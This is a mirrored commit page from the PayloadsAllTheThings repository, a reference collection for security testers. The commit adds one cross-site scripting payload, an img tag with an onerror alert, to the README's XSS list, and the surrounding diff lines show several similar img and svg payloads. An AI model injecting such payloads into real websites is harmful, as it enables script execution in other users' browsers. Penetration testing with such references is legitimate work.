mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Update README.md
This commit is contained in:
parent
46208ca898
commit
49bc19e992
1 changed files with 1 additions and 0 deletions
|
|
@ -250,6 +250,7 @@ Most tools are also suitable for blind XSS attacks:
|
||||||
<img src=x:alert(alt) onerror=eval(src) alt=xss>
|
<img src=x:alert(alt) onerror=eval(src) alt=xss>
|
||||||
"><img src=x onerror=alert('XSS');>
|
"><img src=x onerror=alert('XSS');>
|
||||||
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
|
||||||
|
<><img src=1 onerror=alert(1)>
|
||||||
|
|
||||||
// Svg payload
|
// Svg payload
|
||||||
<svgonload=alert(1)>
|
<svgonload=alert(1)>
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue